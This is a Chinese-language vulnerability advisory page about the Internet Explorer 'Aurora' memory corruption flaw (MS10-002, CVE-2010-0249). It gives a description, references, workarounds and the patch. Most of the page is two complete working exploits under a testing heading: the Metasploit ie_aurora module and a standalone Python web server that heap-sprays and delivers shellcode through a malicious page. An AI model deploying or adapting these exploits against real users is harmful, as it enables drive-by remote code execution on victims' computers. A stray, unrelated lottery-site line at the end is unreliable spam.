首頁 -> 安全研究

安全研究

安全漏洞
Microsoft IE非法事件操作內存破壞漏洞(MS10-002)

發布日期:2010-01-14
更新日期:2010-01-21

受影響系統:
Microsoft Internet Explorer 8.0
Microsoft Internet Explorer 7.0
Microsoft Internet Explorer 6.0 SP1
Microsoft Internet Explorer 6.0
描述:
BUGTRAQ  ID: 37815
CVE ID: CVE-2010-0249

Microsoft IE是微軟Windows操作系統自帶的瀏覽器軟件。

IE在處理非法的事件操作時存在內存破壞漏洞,由于在創建對象以后沒有增加相應的訪問記數,惡意的對象操作流程可能導致指針指向被釋放后重使用的內存,遠程攻擊者可能利用此漏洞通過誘使用戶訪問惡意網頁非法操作內存在用戶系統上執行指令。

此漏洞是一個0day漏洞,證實影響IE 6/7/8版本,已被利用來攻擊一些大型公司的網絡,隨著技術細節和可用攻擊代碼的公開極有可能被利用來執行掛馬攻擊。目前微軟已經發布了相關的安全公告,提供了臨時解決方案,但還沒有提供補丁,強烈建議按照臨時解決方案中的建議采取措施。

<*來源:Microsoft
  
  鏈接:http://blogs.technet.com/msrc/archive/2010/01/14/security-advisory-979352.aspx
        http://secunia.com/advisories/38209/
        http://www.kb.cert.org/vuls/id/492515
        http://extraexploit.blogspot.com/2010/01/iexplorer-0day-cve-2010-0249.html
        http://blogs.technet.com/msrc/archive/2010/01/17/further-insight-into-security-advisory-979352-and-the-threat-landscape.aspx
        http://www.microsoft.com/technet/security/bulletin/ms10-002.mspx?pf=true
        http://www.us-cert.gov/cas/techalerts/TA10-021A.html
*>

測試方法:

警 告

以下程序(方法)可能帶有攻擊性,僅供安全研究與教學之用。使用者風險自負!

##
# $Id: ie_aurora.rb 8140 2010-01-16 01:00:01Z egypt $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
    Rank = NormalRanking

    include Msf::Exploit::Remote::HttpServer::HTML
    include Msf::Exploit::Remote::BrowserAutopwn
    autopwn_info({
        :ua_name    => HttpClients::IE,
        :ua_minver  => "6.0",
        :ua_maxver  => "8.0",
        :javascript => true,
        :os_name    => OperatingSystems::WINDOWS,
        :vuln_test  => nil, # no way to test without just trying it
    })


    def initialize(info = {})
        super(update_info(info,
            'Name'           => 'Microsoft Internet Explorer "Aurora" Memory Corruption',
            'Description'    => %q{
                This module exploits a memory corruption flaw in Internet Explorer. This
            flaw was found in the wild and was a key component of the "Operation Aurora"
            attacks that lead to the compromise of a number of high profile companies. The
            exploit code is a direct port of the public sample published to the Wepawet
            malware analysis site. The technique used by this module is currently identical
            to the public sample, as such, only Internet Explorer 6 can be reliably exploited.
            },
            'License'        => MSF_LICENSE,
            'Author'         =>
                [
                    'unknown',
                    'hdm'      # Metasploit port
                ],
            'Version'        => '$Revision: 8140 $',
            'References'     =>
                [
                    ['CVE', '2010-0249'],
                    ['OSVDB', '61697'],
                    ['URL', 'http://www.microsoft.com/technet/security/advisory/979352.mspx'],
                    ['URL', 'http://wepawet.iseclab.org/view.php?hash=1aea206aa64ebeabb07237f1e2230d0f&type=js']

                ],
            'DefaultOptions' =>
                {
                    'EXITFUNC' => 'process',
                },
            'Payload'        =>
                {
                    'Space'    => 1000,
                    'BadChars' => "\x00",
                    'Compat'   =>
                        {
                            'ConnectionType' => '-find',
                        },
                    'StackAdjustment' => -3500,
                },
            'Platform'       => 'win',
            'Targets'        =>
                [
                    [ 'Automatic', { }],
                ],
            'DisclosureDate' => 'Jan 14 2009', # wepawet sample
            'DefaultTarget'  => 0))
    end

    def on_request_uri(cli, request)

        if (request.uri.match(/\.gif/i))
            data = "R0lGODlhAQABAIAAAAAAAAAAACH5BAEAAAAALAAAAAABAAEAAAICRAEAOw==".unpack("m*")[0]
            send_response(cli, data, { 'Content-Type' => 'image/gif' })
            return
        end

        var_memory    = rand_text_alpha(rand(100) + 1)
        var_boom      = rand_text_alpha(rand(100) + 1)
        var_x1        = rand_text_alpha(rand(100) + 1)
        var_e1        = rand_text_alpha(rand(100) + 1)
        var_e2        = rand_text_alpha(rand(100) + 1)

        var_comment   = rand_text_alpha(rand(100) + 1);
        var_abc       = rand_text_alpha(3);

        var_ev1       = rand_text_alpha(rand(100) + 1)
        var_ev2       = rand_text_alpha(rand(100) + 1)
        var_sp1       = rand_text_alpha(rand(100) + 1)

        var_unescape  = rand_text_alpha(rand(100) + 1)
        var_shellcode = rand_text_alpha(rand(100) + 1)
        var_spray     = rand_text_alpha(rand(100) + 1)
        var_start     = rand_text_alpha(rand(100) + 1)
        var_i         = rand_text_alpha(rand(100) + 1)

        rand_html     = rand_text_english(rand(400) + 500)

        html = %Q|<html>
<head>
<script>

    var #{var_comment} = "COMMENT";

    var #{var_x1} = new Array();
    for (i = 0; i < 200; i ++ ){
       #{var_x1}[i] = document.createElement(#{var_comment});
       #{var_x1}[i].data = "#{var_abc}";
    };

    var #{var_e1} = null;

    var #{var_memory} = new Array();
    var #{var_unescape} = unescape;

    function #{var_boom}() {

        var #{var_shellcode} = #{var_unescape}( '#{Rex::Text.to_unescape(regenerate_payload(cli).encoded)}');

        var #{var_spray} = #{var_unescape}( "%" + "u" + "0" + "c" + "0" + "d" + "%u" + "0" + "c" + "0" + "d" );

        do { #{var_spray} += #{var_spray} } while( #{var_spray}.length < 0xd0000 );

        for(#{var_i} = 0; #{var_i} < 150; #{var_i}++) #{var_memory}[#{var_i}] = #{var_spray} + #{var_shellcode};
    }

    function #{var_ev1}(evt){
        #{var_boom}();
        #{var_e1} = document.createEventObject(evt);
        document.getElementById("#{var_sp1}").innerHTML = "";
        window.setInterval(#{var_ev2}, 50);
    }

    function #{var_ev2}(){
      p = "\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d
      \\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d
      \\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d";
      for (i = 0; i < #{var_x1}.length; i ++ ){
          #{var_x1}[i].data = p;
      }

      var t = #{var_e1}.srcElement;
    }
</script>
</head>
<body>

<span id="#{var_sp1}"><img src="#{get_resource}#{var_start}.gif" onload="#{var_ev1}(event)"></span></body></html>

</body>
</html>
        |

        print_status("Sending #{self.name} to client #{cli.peerhost}")
        # Transmit the compressed response to the client
        send_response(cli, html, { 'Content-Type' => 'text/html', 'Pragma' => 'no-cache' })

        # Handle the payload
        handler(cli)
    end
end

http://www.exploit-db.com/exploits/11167

# Title: Internet Explorer Aurora Exploit
# EDB-ID: 11167
# CVE-ID: (CVE-2010-0249)
# OSVDB-ID: ()
# Author: Ahmed Obied
# Published: 2010-01-17
# Verified: yes
# Download Exploit Code
# Download N/A
#
#   Author : Ahmed Obied ([email protected])
#
#   This program acts as a web server that generates an exploit to
#   target a vulnerability (CVE-2010-0249) in Internet Explorer.
#   The exploit was tested using Internet Explorer 6 on Windows XP SP2.
#   The exploit's payload spawns the calculator.
#
#   Usage  : python ie_aurora.py [port number]
#  
  
import sys
import socket

from BaseHTTPServer import HTTPServer, BaseHTTPRequestHandler
        
class RequestHandler(BaseHTTPRequestHandler):

    def convert_to_utf16(self, payload):
        enc_payload = ''
        for i in range(0, len(payload), 2):
            num = 0
            for j in range(0, 2):
                num += (ord(payload[i + j]) & 0xff) << (j * 8)
            enc_payload += '%%u%04x' % num
        return enc_payload
                
    def get_payload(self):
        # win32_exec - EXITFUNC=process CMD=calc.exe Size=164 Encoder=PexFnstenvSub
        # http://metasploit.com
        payload  = '\x31\xc9\x83\xe9\xdd\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73'
        payload += '\x13\x6f\x02\xb1\x0e\x83\xeb\xfc\xe2\xf4\x93\xea\xf5\x0e'
        payload += '\x6f\x02\x3a\x4b\x53\x89\xcd\x0b\x17\x03\x5e\x85\x20\x1a'
        payload += '\x3a\x51\x4f\x03\x5a\x47\xe4\x36\x3a\x0f\x81\x33\x71\x97'
        payload += '\xc3\x86\x71\x7a\x68\xc3\x7b\x03\x6e\xc0\x5a\xfa\x54\x56'
        payload += '\x95\x0a\x1a\xe7\x3a\x51\x4b\x03\x5a\x68\xe4\x0e\xfa\x85'
        payload += '\x30\x1e\xb0\xe5\xe4\x1e\x3a\x0f\x84\x8b\xed\x2a\x6b\xc1'
        payload += '\x80\xce\x0b\x89\xf1\x3e\xea\xc2\xc9\x02\xe4\x42\xbd\x85'
        payload += '\x1f\x1e\x1c\x85\x07\x0a\x5a\x07\xe4\x82\x01\x0e\x6f\x02'
        payload += '\x3a\x66\x53\x5d\x80\xf8\x0f\x54\x38\xf6\xec\xc2\xca\x5e'
        payload += '\x07\x7c\x69\xec\x1c\x6a\x29\xf0\xe5\x0c\xe6\xf1\x88\x61'
        payload += '\xd0\x62\x0c\x2c\xd4\x76\x0a\x02\xb1\x0e'
        return self.convert_to_utf16(payload)
    
    def get_exploit(self):
        exploit = '''
        <html>
        <head>
            <script>
            
            var obj, event_obj;
            
            function spray_heap()
            {
                var chunk_size, payload, nopsled;
            
                chunk_size = 0x80000;
                payload = unescape("<PAYLOAD>");
                nopsled = unescape("<NOP>");
                while (nopsled.length < chunk_size)
                    nopsled += nopsled;
                nopsled_len = chunk_size - (payload.length + 20);      
                nopsled = nopsled.substring(0, nopsled_len);
                heap_chunks = new Array();
                for (var i = 0 ; i < 200 ; i++)
                    heap_chunks[i] = nopsled + payload;
            }
        
            function initialize()
            {
                obj = new Array();
                event_obj = null;
                for (var i = 0; i < 200 ; i++ )
                    obj[i] = document.createElement("COMMENT");
            }
        
            function ev1(evt)
            {
                event_obj = document.createEventObject(evt);
                document.getElementById("sp1").innerHTML = "";
                window.setInterval(ev2, 1);
            }
      
            function ev2()
            {
                var data, tmp;
                
                data = "";
                tmp = unescape("%u0a0a%u0a0a");
                for (var i = 0 ; i < 4 ; i++)
                    data += tmp;
                for (i = 0 ; i < obj.length ; i++ ) {
                    obj[i].data = data;
                }
                event_obj.srcElement;
            }
                    
            function check()
            {
                if (navigator.userAgent.indexOf("MSIE") == -1)
                    return false;
                return true;  
            }
            
            if (check()) {
                initialize();
                spray_heap();              
            }
            else
                window.location = 'about:blank'
                
            </script>
        </head>
        <body>
            <span id="sp1">
            <img src="aurora.gif" onload="ev1(event)">
            </span>      
        </body>
        </html>
        '''
        exploit = exploit.replace('<PAYLOAD>', self.get_payload())
        exploit = exploit.replace('<NOP>', '%u0a0a%u0a0a')
        return exploit

    def get_image(self):
        content  = '\x47\x49\x46\x38\x39\x61\x01\x00\x01\x00\x80\x00\x00\xff\xff\xff'
        content += '\x00\x00\x00\x2c\x00\x00\x00\x00\x01\x00\x01\x00\x00\x02\x02\x44'
        content += '\x01\x00\x3b'
        return content

    def log_request(self, *args, **kwargs):
        pass
        
    def do_GET(self):
        try:
            if self.path == '/':
                print
                print '[-] Incoming connection from %s' % self.client_address[0]
                self.send_response(200)
                self.send_header('Content-Type', 'text/html')
                self.end_headers()
                print '[-] Sending exploit to %s ...' % self.client_address[0]
                self.wfile.write(self.get_exploit())
                print '[-] Exploit sent to %s' % self.client_address[0]
            elif self.path == '/aurora.gif':    
                self.send_response(200)
                self.send_header('Content-Type', 'image/gif')
                self.end_headers()
                self.wfile.write(self.get_image())
        except:
            print '[*] Error : an error has occured while serving the HTTP request'
            print '[-] Exiting ...'
            sys.exit(-1)
            
                        
def main():
    if len(sys.argv) != 2:
        print 'Usage: %s [port number (between 1024 and 65535)]' % sys.argv[0]
        sys.exit(0)
    try:
        port = int(sys.argv[1])
        if port < 1024 or port > 65535:
            raise ValueError
        try:
            serv = HTTPServer(('', port), RequestHandler)
            ip = socket.gethostbyname(socket.gethostname())
            print '[-] Web server is running at http://%s:%d/' % (ip, port)
            try:
                serv.serve_forever()
            except:
                print '[-] Exiting ...'
        except socket.error:
            print '[*] Error : a socket error has occurred'
        sys.exit(-1)  
    except ValueError:
        print '[*] Error : an invalid port number was given'
        sys.exit(-1)
            
if __name__ == '__main__':
    main()

建議:
臨時解決方法:

* 對Internet Explorer 6 SP2或Internet Explorer 7啟用DEP。

  微軟提供了一個自動化的工具為IE 6/7開啟DEP,請到如下網址下載:
  http://go.microsoft.com/?linkid=9668626

* 將Internet Explorer配置為在Internet和本地Intranet安全區域中運行ActiveX控件和活動腳本之前進行提示。
* 將Internet 和本地Intranet安全區域設置設為“高”,以便在這些區域中運行ActiveX控件和活動腳本之前進行提示。

廠商補丁:

Microsoft
---------
Microsoft已經為此發布了一個安全公告(MS10-002)以及相應補丁:
MS10-002:Cumulative Security Update for Internet Explorer (978207)
鏈接:http://www.microsoft.com/technet/security/bulletin/ms10-002.mspx?pf=true

瀏覽次數:13495
嚴重程度:0(網友投票)
本安全漏洞由綠盟科技翻譯整理,版權所有,未經許可,不得轉載
綠盟科技給您安全的保障
海南七星彩彩票官网